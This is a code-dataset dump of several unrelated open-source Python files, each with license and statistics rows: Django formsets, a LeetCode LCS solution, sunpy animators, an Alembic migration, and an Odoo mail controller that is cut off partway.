# argument given, but it's obviously still wrong and bug-prone.
# The alternative is lots of ugly duplication or another exceedingly
# meta 'factory' function, neither of which are nice options.
DateFormSet = inlineformset_factory(models.Collection, models.FuzzyDate,
form=FuzzyDateForm, extra=1)
OtherNameFormSet = inlineformset_factory(models.Collection, models.OtherFormOfName,
form=OtherNameForm, extra=1)
ParallelNameFormSet = inlineformset_factory(models.Collection, models.ParallelFormOfName,
form=OtherNameForm, extra=1)
ContactFormSet = inlineformset_factory(models.Repository, models.Contact,
form=ContactForm, extra=1)
|
mit
| -8,758,907,469,438,605,000
| 32.612022
| 95
| 0.679402
| false
| 4.128188
| false
| false
| false
|
franklingu/leetcode-solutions
|
questions/longest-common-subsequence/Solution.py
|
1
|
1711
|
"""
Given two strings text1 and text2, return the length of their longest common subsequence.
A subsequence of a string is a new string generated from the original string with some characters(can be none) deleted without changing the relative order of the remaining characters. (eg, "ace" is a subsequence of "abcde" while "aec" is not). A common subsequence of two strings is a subsequence that is common to both strings.
If there is no common subsequence, return 0.
Example 1:
Input: text1 = "abcde", text2 = "ace"
Output: 3
Explanation: The longest common subsequence is "ace" and its length is 3.
Example 2:
Input: text1 = "abc", text2 = "abc"
Output: 3
Explanation: The longest common subsequence is "abc" and its length is 3.
Example 3:
Input: text1 = "abc", text2 = "def"
Output: 0
Explanation: There is no such common subsequence, so the result is 0.
Constraints:
1 <= text1.length <= 1000
1 <= text2.length <= 1000
The input strings consist of lowercase English characters only.
"""
class Solution:
def longestCommonSubsequence(self, text1: str, text2: str) -> int:
if not text1 or not text2:
return 0
dp = [[0] * len(text2) for _ in text1]
for i, c1 in enumerate(text1):
for j, c2 in enumerate(text2):
if c1 == c2:
dp[i][j] = 1 if i < 1 or j < 1 else dp[i - 1][j - 1] + 1
continue
if i < 1:
n1 = 0
else:
n1 = dp[i - 1][j]
if j < 1:
n2 = 0
else:
n2 = dp[i][j - 1]
dp[i][j] = max(n1, n2)
return dp[-1][-1]
|
mit
| -3,796,396,246,717,548,000
| 29.553571
| 328
| 0.5827
| false
| 3.572025
| false
| false
| false
|
iwinulose/eve
|
eve/objects.py
|
1
|
2549
|
# Copyright (c) 2014, Charles Duyk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class Entity(object):
def __init__(self, name, theId):
self._name = name
self._id = int(theId)
def __repr__(self):
return "%s(\"%s\", %d)" % (self.__class__.__name__, self.getName(), self.getID())
def __str__(self):
return "%s (id: %d)" % (self.getName(), self.getID())
def __eq__(self, other):
if isinstance(other, Entity):
return self.getID() == other.getID()
return NotImplemented
def __ne__(self, other):
isEqual = self.__eq__(other)
if isEqual is NotImplemented:
return isEqual
return not isEqual
def getName(self):
return self._name
def getID(self):
return self._id
def valueByVolume(self, pricePerUnit, volume=1.0):
volumeFloat = volume + 0.0
unitVolume = self.getSize()
pricePerMeter = pricePerUnit/unitVolume
value = pricePerMeter * volumeFloat
return value
class Item(Entity):
def __init__(self, name, marketID, size):
super(Item, self).__init__(name, marketID)
self._size = size + 0.0
def __repr__(self):
return "Item(\"%s\", %d, %f)" % (self.getName(), self.getID(), self.getSize())
def __str__(self):
return "%s: id %d size %f" % (self.getName(), self.getID(), self.getSize())
def getSize(self):
return self._size
|
bsd-2-clause
| -414,263,850,727,675,300
| 31.679487
| 83
| 0.708905
| false
| 3.641429
| false
| false
| false
|
apache/bloodhound
|
bloodhound_dashboard/bhdashboard/wiki.py
|
2
|
3618
|
# -*- coding: UTF-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
r"""Project dashboard for Apache(TM) Bloodhound
WikiMacros and WikiProcessors related to dashboard system.
"""
from ast import literal_eval
from genshi.builder import tag
from trac.web.chrome import Chrome
from trac.wiki.api import parse_args
from trac.wiki.macros import WikiMacroBase
from bhdashboard.web_ui import DashboardChrome, DashboardModule
GUIDE_NAME = 'Guide'
RENAME_MAP = {'TracGuide': GUIDE_NAME + '/Index',}
def new_name(name, force=False):
if name.startswith('Trac'):
return RENAME_MAP.get(name, GUIDE_NAME + '/' + name[4:])
else:
return name
class WidgetMacro(WikiMacroBase):
"""Embed Bloodhound widgets using WikiFormatting.
"""
#: A gettext domain to translate the macro description
_domain = None
#: A macro description
_description = """Embed Bloodhound widgets using WikiFormatting."""
def expand_macro(self, formatter, name, content):
"""Render widget contents by re-using wiki markup implementation
"""
if self.env[DashboardModule] is None:
return DashboardModule(self.env).alert_disabled()
largs, kwargs = parse_args(content, strict=True)
try:
(widget_name ,) = largs
except ValueError:
template = 'widget_alert.html'
data = {
'msgtype' : 'error',
'msglabel' : 'Error',
'msgbody' : tag('Expected ', tag.code(1),
' positional argument (i.e. widget name), but got ',
tag.code(len(largs)), ' instead'),
'msgdetails' : [
('Macro name', tag.code('WidgetMacro')),
('Arguments', ', '.join(largs) if largs \
else tag.span('None', class_='label')),
],
}
else:
widget_name = widget_name.strip()
wopts = {} ; wargs = {}
def parse_literal(value):
try:
return literal_eval(value)
except (SyntaxError, ValueError):
return value
for argnm, value in kwargs.iteritems():
if argnm.startswith('wo_'):
wopts[argnm[3:]] = value
else :
wargs[argnm] = parse_literal(value)
template = 'widget.html'
data = {
'args' : wargs,
'bhdb' : DashboardChrome(self.env),
'id' : None,
'opts' : wopts,
'widget' : widget_name
}
return Chrome(self.env).render_template(
formatter.req, template, data, fragment=True)
|
apache-2.0
| 3,236,449,236,041,884,000
| 35.18
| 80
| 0.572692
| false
| 4.231579
| false
| false
| false
|
bskari/sparkfun-avc
|
analysis/process_gps.py
|
1
|
1997
|
"""Formats GPS log messages into a path KMZ file that Google Earth can read."""
#!/bin/env python
import collections
import json
import sys
from plot_points import get_kml
def main():
"""Main function."""
if len(sys.argv) <= 1:
print('Usage: {} <log file>'.format(sys.argv[0]))
return
in_file_name = sys.argv[1]
name = in_file_name[:in_file_name.rfind('.')]
out_file_name = sys.argv[2] if len(sys.argv) > 2 else 'out.kml'
with open(in_file_name) as in_stream:
lines = in_stream.readlines()
runs = process_lines(iter(lines))
with open(out_file_name, 'w') as out_stream:
out_stream.write(get_kml(runs, name))
def process_lines(in_stream):
"""I don't know."""
run_count = 1
runs = []
for line in in_stream:
if 'Received run command' in line or 'Button pressed' in line:
print('Starting run {}'.format(run_count))
runs.append(process_run(in_stream, run_count))
run_count += 1
return runs
def process_run(in_stream, run_count):
"""Returns the points in a run."""
points = collections.defaultdict(lambda: [])
for line in in_stream:
if 'Received stop command' in line or 'No waypoints, stopping' in line:
break
elif '"device_id"' in line:
parts = json.loads(line[line.find('{'):line.rfind('}') + 1])
if 'latitude_d' not in parts:
# Probably an accelerometer message
continue
latitude = parts['latitude_d']
longitude = parts['longitude_d']
# Ignore early bad estimates
if latitude > 1:
points[parts['device_id']].append((latitude, longitude))
else:
print('Ignoring {},{}'.format(latitude, longitude))
print(
'Ending run {} with {} paths'.format(
run_count,
len(points)
)
)
return points
if __name__ == '__main__':
main()
|
mit
| -5,713,281,913,200,312,000
| 28.367647
| 79
| 0.564347
| false
| 3.767925
| false
| false
| false
|
magfest/ubersystem
|
alembic/versions/e74a6a5904cd_add_payment_method_to_receipt_items.py
|
1
|
1766
|
"""Add payment_method to receipt items
Revision ID: e74a6a5904cd
Revises: 53b71e7c45b5
Create Date: 2019-12-20 19:00:34.631484
"""
# revision identifiers, used by Alembic.
revision = 'e74a6a5904cd'
down_revision = '53b71e7c45b5'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('receipt_item', sa.Column('payment_method', sa.Integer(), server_default='180350097', nullable=False))
def downgrade():
op.drop_column('receipt_item', 'payment_method')
|
agpl-3.0
| -5,071,260,178,703,831,000
| 28.932203
| 120
| 0.627973
| false
| 3.503968
| false
| false
| false
|
dpshelio/sunpy
|
sunpy/visualization/animator/image.py
|
2
|
9327
|
import matplotlib as mpl
import astropy.wcs
from sunpy.visualization.animator.base import ArrayAnimator
__all__ = ['ImageAnimator', 'ImageAnimatorWCS']
class ImageAnimator(ArrayAnimator):
"""
Create a matplotlib backend independent data explorer for 2D images.
The following keyboard shortcuts are defined in the viewer:
* 'left': previous step on active slider.
* 'right': next step on active slider.
* 'top': change the active slider up one.
* 'bottom': change the active slider down one.
* 'p': play/pause active slider.
This viewer can have user defined buttons added by specifying the labels
and functions called when those buttons are clicked as keyword arguments.
Parameters
----------
data: `numpy.ndarray`
The data to be visualized.
image_axes: `list`, optional
A list of the axes order that make up the image.
axis_ranges: `list` of physical coordinates for the `numpy.ndarray`, optional
Defaults to `None` and array indices will be used for all axes.
The `list` should contain one element for each axis of the `numpy.ndarray`.
For the image axes a ``[min, max]`` pair should be specified which will be
passed to `matplotlib.pyplot.imshow` as an extent.
For the slider axes a ``[min, max]`` pair can be specified or an array the
same length as the axis which will provide all values for that slider.
Notes
-----
Extra keywords are passed to `~sunpy.visualization.animator.ArrayAnimator`.
"""
def __init__(self, data, image_axes=[-2, -1], axis_ranges=None, **kwargs):
# Check that number of axes is 2.
if len(image_axes) != 2:
raise ValueError("There can only be two spatial axes")
# Define number of slider axes.
self.naxis = data.ndim
self.num_sliders = self.naxis-2
# Define marker to determine if plot axes values are supplied via array of
# pixel values or min max pair. This will determine the type of image produced
# and hence how to plot and update it.
self._non_regular_plot_axis = False
# Run init for parent class
super().__init__(data, image_axes=image_axes, axis_ranges=axis_ranges, **kwargs)
def plot_start_image(self, ax):
"""
Sets up plot of initial image.
"""
# Create extent arg
extent = []
# reverse because numpy is in y-x and extent is x-y
if max([len(self.axis_ranges[i]) for i in self.image_axes[::-1]]) > 2:
self._non_regular_plot_axis = True
for i in self.image_axes[::-1]:
if self._non_regular_plot_axis is False and len(self.axis_ranges[i]) > 2:
self._non_regular_plot_axis = True
extent.append(self.axis_ranges[i][0])
extent.append(self.axis_ranges[i][-1])
imshow_args = {'interpolation': 'nearest',
'origin': 'lower'}
imshow_args.update(self.imshow_kwargs)
# If value along an axis is set with an array, generate a NonUniformImage
if self._non_regular_plot_axis:
# If user has inverted the axes, transpose the data so the dimensions match.
if self.image_axes[0] < self.image_axes[1]:
data = self.data[self.frame_index].transpose()
else:
data = self.data[self.frame_index]
# Initialize a NonUniformImage with the relevant data and axis values and
# add the image to the axes.
im = mpl.image.NonUniformImage(ax, **imshow_args)
im.set_data(self.axis_ranges[self.image_axes[0]], self.axis_ranges[self.image_axes[1]], data)
ax.add_image(im)
# Define the xlim and ylim from the pixel edges.
ax.set_xlim(self.extent[0], self.extent[1])
ax.set_ylim(self.extent[2], self.extent[3])
else:
# Else produce a more basic plot with regular axes.
imshow_args.update({'extent': extent})
im = ax.imshow(self.data[self.frame_index], **imshow_args)
if self.if_colorbar:
self._add_colorbar(im)
return im
def update_plot(self, val, im, slider):
"""
Updates plot based on slider/array dimension being iterated.
"""
ind = int(val)
ax_ind = self.slider_axes[slider.slider_ind]
self.frame_slice[ax_ind] = ind
if val != slider.cval:
if self._non_regular_plot_axis:
if self.image_axes[0] < self.image_axes[1]:
data = self.data[self.frame_index].transpose()
else:
data = self.data[self.frame_index]
im.set_data(self.axis_ranges[self.image_axes[0]],
self.axis_ranges[self.image_axes[1]], data)
else:
im.set_array(self.data[self.frame_index])
slider.cval = val
# Update slider label to reflect real world values in axis_ranges.
super().update_plot(val, im, slider)
class ImageAnimatorWCS(ImageAnimator):
"""
Animates N-dimensional data with the associated `astropy.wcs.WCS`
information.
The following keyboard shortcuts are defined in the viewer:
* 'left': previous step on active slider.
* 'right': next step on active slider.
* 'top': change the active slider up one.
* 'bottom': change the active slider down one.
* 'p': play/pause active slider.
This viewer can have user defined buttons added by specifying the labels
and functions called when those buttons are clicked as keyword arguments.
Parameters
----------
data: `numpy.ndarray`
The data to be visualized.
image_axes: `list`, optional
A list of the axes order that make up the image.
unit_x_axis: `astropy.units.Unit`
The unit of X axis.
unit_y_axis: `astropy.units.Unit`
The unit of Y axis.
axis_ranges: `list` of physical coordinates for the `numpy.ndarray`, optional
Defaults to `None` and array indices will be used for all axes.
The `list` should contain one element for each axis of the `numpy.ndarray`.
For the image axes a ``[min, max]`` pair should be specified which will be
passed to `matplotlib.pyplot.imshow` as an extent.
For the slider axes a ``[min, max]`` pair can be specified or an array the
same length as the axis which will provide all values for that slider.
Notes
-----
Extra keywords are passed to `~sunpy.visualization.animator.ArrayAnimator`.
"""
def __init__(self, data, wcs=None, image_axes=[-1, -2], unit_x_axis=None, unit_y_axis=None,
axis_ranges=None, **kwargs):
if not isinstance(wcs, astropy.wcs.WCS):
raise ValueError("wcs data should be provided.")
if wcs.wcs.naxis is not data.ndim:
raise ValueError("Dimensions of data and wcs not matching")
self.wcs = wcs
list_slices_wcsaxes = [0 for i in range(self.wcs.naxis)]
list_slices_wcsaxes[image_axes[0]] = 'x'
list_slices_wcsaxes[image_axes[1]] = 'y'
self.slices_wcsaxes = list_slices_wcsaxes[::-1]
self.unit_x_axis = unit_x_axis
self.unit_y_axis = unit_y_axis
super().__init__(data, image_axes=image_axes, axis_ranges=axis_ranges, **kwargs)
def _get_main_axes(self):
axes = self.fig.add_axes([0.1, 0.1, 0.8, 0.8], projection=self.wcs,
slices=self.slices_wcsaxes)
self._set_unit_in_axis(axes)
return axes
def _set_unit_in_axis(self, axes):
x_index = self.slices_wcsaxes.index("x")
y_index = self.slices_wcsaxes.index("y")
if self.unit_x_axis is not None:
axes.coords[x_index].set_format_unit(self.unit_x_axis)
axes.coords[x_index].set_ticks(exclude_overlapping=True)
if self.unit_y_axis is not None:
axes.coords[y_index].set_format_unit(self.unit_y_axis)
axes.coords[y_index].set_ticks(exclude_overlapping=True)
def plot_start_image(self, ax):
"""
Sets up a plot of initial image.
"""
imshow_args = {'interpolation': 'nearest',
'origin': 'lower',
}
imshow_args.update(self.imshow_kwargs)
im = ax.imshow(self.data[self.frame_index], **imshow_args)
if self.if_colorbar:
self._add_colorbar(im)
return im
def update_plot(self, val, im, slider):
"""
Updates plot based on slider/array dimension being iterated.
"""
ind = int(val)
ax_ind = self.slider_axes[slider.slider_ind]
self.frame_slice[ax_ind] = ind
list_slices_wcsaxes = list(self.slices_wcsaxes)
list_slices_wcsaxes[self.wcs.naxis-ax_ind-1] = val
self.slices_wcsaxes = list_slices_wcsaxes
if val != slider.cval:
self.axes.reset_wcs(wcs=self.wcs, slices=self.slices_wcsaxes)
self._set_unit_in_axis(self.axes)
im.set_array(self.data[self.frame_index])
slider.cval = val
# Update slider label to reflect real world values in axis_ranges.
super().update_plot(val, im, slider)
|
bsd-2-clause
| -2,824,382,928,485,726,700
| 41.395455
| 105
| 0.609199
| false
| 3.833539
| false
| false
| false
|
rbianchi66/survey
|
src/radioquestion.py
|
1
|
2777
|
from PyQt4 import QtGui, Qt, QtCore
from question import Question
class RadioQuestion(Question):
def __init__(self, id, question, card, parent = None):
self.buttons = []
super(RadioQuestion, self).__init__(id, question, card, parent)
def updateValue(self, question, answer):
self.card.set(question, answer)
self.emit( Qt.SIGNAL("clicked()"))
def showButtons(self, q):
qind = 0
if len(q) > 5:
hlay = QtGui.QHBoxLayout()
ncols = len(q) / 5
for nc in xrange(ncols):
qlay = QtGui.QVBoxLayout()
for icol in xrange(5):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, valore = q[qind]
self.connect(element, Qt.SIGNAL("clicked()"), lambda n = n : self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(valore)
qlay.addWidget(element)
qind += 1
hlay.addLayout(qlay)
if len(q)%5 > 0:
qlay = QtGui.QVBoxLayout()
for icol in xrange(len(q)%5):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, val = q[qind]
self.connect(element, Qt.SIGNAL("clicked()"), lambda n = n : self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(val)
qlay.addWidget(element)
qind += 1
hlay.addLayout(qlay)
self.answers_layout.addLayout(hlay)
else:
for icol in xrange(len(q)):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, val = q[qind]
self.connect(element, Qt.SIGNAL("clicked()"), lambda n = n : self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(val)
self.answers_layout.addWidget(element)
qind += 1
if len(self.buttons):
bf = None
for b in self.buttons:
if b.isChecked() == True:
bf = b
if bf is None:
answer, question, valore = q[0]
self.updateValue(question, answer)
self.buttons[0].setChecked(True)
|
gpl-2.0
| 6,312,017,638,981,724,000
| 40.723077
| 111
| 0.476413
| false
| 4.479032
| false
| false
| false
|
wlieurance/aim-reporting
|
classes.py
|
1
|
2503
|
import numpy
### sample standard deviation
class stdevs:
def __init__(self):
self.list = []
self.x = 0
def step(self, value):
if value != None:
self.list.append(value)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
self.x = numpy.std(self.list, ddof=1)
else:
self.x = None
return self.x
### population standard deviation
class stdevp:
def __init__(self):
self.list = []
self.x = 0
def step(self, value):
if value != None:
self.list.append(value)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
self.x = numpy.std(self.list, ddof=0)
else:
self.x = None
return self.x
### weighted mean
class meanw:
def __init__(self):
self.wgtlist = []
self.list = []
self.x = 0
def step(self, value, wgt):
if wgt == None:
wgt = 1
if value != None:
self.list.append(value)
self.wgtlist.append(wgt)
def finalize(self):
#print(self.list)
if len(self.list) >= 1:
y = numpy.array(self.list)
w = numpy.array(self.wgtlist)
self.x = (numpy.sum(w*y))/(numpy.sum(w))
else:
self.x = None
return self.x
### weighted standard deviation
class stdevw:
def __init__(self):
self.wgtlist = []
self.list = []
self.x = 0
def step(self, value, wgt):
if wgt == None:
wgt = 1
if value != None:
self.list.append(value)
self.wgtlist.append(wgt)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
#unbiased estimator of variance with sample weights
#https://www.gnu.org/software/gsl/manual/html_node/Weighted-Samples.html
#https://en.wikipedia.org/wiki/Weighted_arithmetic_mean ###Reliability weights
y = numpy.array(self.list)
w = numpy.array(self.wgtlist)
V1 = numpy.sum(w)
V2 = numpy.sum(w**2)
mu = (numpy.sum(w*y)/V1) #weighted mean
muArray = numpy.full(y.size, mu)
sigma2w = numpy.sum(w*((y-muArray)**2))
self.x = (sigma2w/(V1-(V2/V1)))**(0.5)
#print("mu:",mu,"V1:",V1,"V2:",V2,"sigma2w:", sigma2w,"x:", self.x)
else:
self.x = None
return self.x
|
gpl-3.0
| 3,504,032,938,813,552,000
| 28.104651
| 92
| 0.503396
| false
| 3.387009
| false
| false
| false
|
ddico/odoo
|
addons/mail/controllers/main.py
|
1
|
14644
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import base64
import logging
import psycopg2
import werkzeug.utils
import werkzeug.wrappers
from werkzeug.urls import url_encode
from odoo import api, http, registry, SUPERUSER_ID, _
from odoo.exceptions import AccessError
from odoo.http import request
from odoo.tools import consteq
_logger = logging.getLogger(__name__)
class MailController(http.Controller):
_cp_path = '/mail'
@classmethod
def _redirect_to_messaging(cls):
url = '/web#%s' % url_encode({'action': 'mail.action_discuss'})
return werkzeug.utils.redirect(url)
@classmethod
def _check_token(cls, token):
base_link = request.httprequest.path
params = dict(request.params)
params.pop('token', '')
valid_token = request.env['mail.thread']._notify_encode_link(base_link, params)
return consteq(valid_token, str(token))
@classmethod
def _check_token_and_record_or_redirect(cls, model, res_id, token):
comparison = cls._check_token(token)
if not comparison:
_logger.warning(_('Invalid token in route %s', request.httprequest.url))
return comparison, None, cls._redirect_to_messaging()
try:
record = request.env[model].browse(res_id).exists()
except Exception:
record = None
redirect = cls._redirect_to_messaging()
else:
redirect = cls._redirect_to_record(model, res_id)
return comparison, record, redirect
@classmethod
def _redirect_to_record(cls, model, res_id, access_token=None, **kwargs):
# access_token and kwargs are used in the portal controller override for the Send by email or Share Link
# to give access to the record to a recipient that has normally no access.
uid = request.session.uid
user = request.env['res.users'].sudo().browse(uid)
cids = False
# no model / res_id, meaning no possible record -> redirect to login
if not model or not res_id or model not in request.env:
return cls._redirect_to_messaging()
# find the access action using sudo to have the details about the access link
RecordModel = request.env[model]
record_sudo = RecordModel.sudo().browse(res_id).exists()
if not record_sudo:
# record does not seem to exist -> redirect to login
return cls._redirect_to_messaging()
# the record has a window redirection: check access rights
if uid is not None:
if not RecordModel.with_user(uid).check_access_rights('read', raise_exception=False):
return cls._redirect_to_messaging()
try:
# We need here to extend the "allowed_company_ids" to allow a redirection
# to any record that the user can access, regardless of currently visible
# records based on the "currently allowed companies".
cids = request.httprequest.cookies.get('cids', str(user.company_id.id))
cids = [int(cid) for cid in cids.split(',')]
try:
record_sudo.with_user(uid).with_context(allowed_company_ids=cids).check_access_rule('read')
except AccessError:
# In case the allowed_company_ids from the cookies (i.e. the last user configuration
# on his browser) is not sufficient to avoid an ir.rule access error, try to following
# heuristic:
# - Guess the supposed necessary company to access the record via the method
# _get_mail_redirect_suggested_company
# - If no company, then redirect to the messaging
# - Merge the suggested company with the companies on the cookie
# - Make a new access test if it succeeds, redirect to the record. Otherwise,
# redirect to the messaging.
suggested_company = record_sudo._get_mail_redirect_suggested_company()
if not suggested_company:
raise AccessError('')
cids = cids + [suggested_company.id]
record_sudo.with_user(uid).with_context(allowed_company_ids=cids).check_access_rule('read')
except AccessError:
return cls._redirect_to_messaging()
else:
record_action = record_sudo.get_access_action(access_uid=uid)
else:
record_action = record_sudo.get_access_action()
if record_action['type'] == 'ir.actions.act_url' and record_action.get('target_type') != 'public':
return cls._redirect_to_messaging()
record_action.pop('target_type', None)
# the record has an URL redirection: use it directly
if record_action['type'] == 'ir.actions.act_url':
return werkzeug.utils.redirect(record_action['url'])
# other choice: act_window (no support of anything else currently)
elif not record_action['type'] == 'ir.actions.act_window':
return cls._redirect_to_messaging()
url_params = {
'model': model,
'id': res_id,
'active_id': res_id,
'action': record_action.get('id'),
}
view_id = record_sudo.get_formview_id()
if view_id:
url_params['view_id'] = view_id
if cids:
url_params['cids'] = ','.join([str(cid) for cid in cids])
url = '/web?#%s' % url_encode(url_params)
return werkzeug.utils.redirect(url)
@http.route('/mail/read_followers', type='json', auth='user')
def read_followers(self, follower_ids):
request.env['mail.followers'].check_access_rights("read")
follower_recs = request.env['mail.followers'].sudo().browse(follower_ids)
res_ids = follower_recs.mapped('res_id')
res_models = set(follower_recs.mapped('res_model'))
if len(res_models) > 1:
raise AccessError(_("Can't read followers with different targeted model"))
res_model = res_models.pop()
request.env[res_model].check_access_rights("read")
request.env[res_model].browse(res_ids).check_access_rule("read")
followers = []
follower_id = None
for follower in follower_recs:
if follower.partner_id == request.env.user.partner_id:
follower_id = follower.id
followers.append({
'id': follower.id,
'partner_id': follower.partner_id.id,
'channel_id': follower.channel_id.id,
'name': follower.name,
'email': follower.email,
'is_active': follower.is_active,
# When editing the followers, the "pencil" icon that leads to the edition of subtypes
# should be always be displayed and not only when "debug" mode is activated.
'is_editable': True
})
return {
'followers': followers,
'subtypes': self.read_subscription_data(follower_id) if follower_id else None
}
@http.route('/mail/read_subscription_data', type='json', auth='user')
def read_subscription_data(self, follower_id):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
request.env['mail.followers'].check_access_rights("read")
follower = request.env['mail.followers'].sudo().browse(follower_id)
follower.ensure_one()
request.env[follower.res_model].check_access_rights("read")
request.env[follower.res_model].browse(follower.res_id).check_access_rule("read")
# find current model subtypes, add them to a dictionary
subtypes = request.env['mail.message.subtype'].search([
'&', ('hidden', '=', False),
'|', ('res_model', '=', follower.res_model), ('res_model', '=', False)])
followed_subtypes_ids = set(follower.subtype_ids.ids)
subtypes_list = [{
'name': subtype.name,
'res_model': subtype.res_model,
'sequence': subtype.sequence,
'default': subtype.default,
'internal': subtype.internal,
'followed': subtype.id in followed_subtypes_ids,
'parent_model': subtype.parent_id.res_model,
'id': subtype.id
} for subtype in subtypes]
return sorted(subtypes_list,
key=lambda it: (it['parent_model'] or '', it['res_model'] or '', it['internal'], it['sequence']))
@http.route('/mail/view', type='http', auth='public')
def mail_action_view(self, model=None, res_id=None, access_token=None, **kwargs):
""" Generic access point from notification emails. The heuristic to
choose where to redirect the user is the following :
- find a public URL
- if none found
- users with a read access are redirected to the document
- users without read access are redirected to the Messaging
- not logged users are redirected to the login page
models that have an access_token may apply variations on this.
"""
# ==============================================================================================
# This block of code disappeared on saas-11.3 to be reintroduced by TBE.
# This is needed because after a migration from an older version to saas-11.3, the link
# received by mail with a message_id no longer work.
# So this block of code is needed to guarantee the backward compatibility of those links.
if kwargs.get('message_id'):
try:
message = request.env['mail.message'].sudo().browse(int(kwargs['message_id'])).exists()
except:
message = request.env['mail.message']
if message:
model, res_id = message.model, message.res_id
# ==============================================================================================
if res_id and isinstance(res_id, str):
res_id = int(res_id)
return self._redirect_to_record(model, res_id, access_token, **kwargs)
@http.route('/mail/assign', type='http', auth='user', methods=['GET'])
def mail_action_assign(self, model, res_id, token=None):
comparison, record, redirect = self._check_token_and_record_or_redirect(model, int(res_id), token)
if comparison and record:
try:
record.write({'user_id': request.uid})
except Exception:
return self._redirect_to_messaging()
return redirect
@http.route('/mail/<string:res_model>/<int:res_id>/avatar/<int:partner_id>', type='http', auth='public')
def avatar(self, res_model, res_id, partner_id):
headers = [('Content-Type', 'image/png')]
status = 200
content = 'R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==' # default image is one white pixel
if res_model in request.env:
try:
# if the current user has access to the document, get the partner avatar as sudo()
request.env[res_model].browse(res_id).check_access_rule('read')
if partner_id in request.env[res_model].browse(res_id).sudo().exists().message_ids.mapped('author_id').ids:
status, headers, _content = request.env['ir.http'].sudo().binary_content(
model='res.partner', id=partner_id, field='image_128', default_mimetype='image/png')
# binary content return an empty string and not a placeholder if obj[field] is False
if _content != '':
content = _content
if status == 304:
return werkzeug.wrappers.Response(status=304)
except AccessError:
pass
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status = str(status)
return response
@http.route('/mail/needaction', type='json', auth='user')
def needaction(self):
return request.env['res.partner'].get_needaction_count()
@http.route('/mail/init_messaging', type='json', auth='user')
def mail_init_messaging(self):
values = {
'needaction_inbox_counter': request.env['res.partner'].get_needaction_count(),
'starred_counter': request.env['res.partner'].get_starred_count(),
'channel_slots': request.env['mail.channel'].channel_fetch_slot(),
'mail_failures': request.env['mail.message'].message_fetch_failed(),
'commands': request.env['mail.channel'].get_mention_commands(),
'mention_partner_suggestions': request.env['res.partner'].get_static_mention_suggestions(),
'shortcodes': request.env['mail.shortcode'].sudo().search_read([], ['source', 'substitution', 'description']),
'menu_id': request.env['ir.model.data'].xmlid_to_res_id('mail.menu_root_discuss'),
'is_moderator': request.env.user.is_moderator,
'moderation_counter': request.env.user.moderation_counter,
'moderation_channel_ids': request.env.user.moderation_channel_ids.ids,
'partner_root': request.env.ref('base.partner_root').sudo().mail_partner_format(),
'public_partner': request.env.ref('base.public_partner').sudo().mail_partner_format(),
}
return values
@http.route('/mail/get_partner_info', type='json', auth='user')
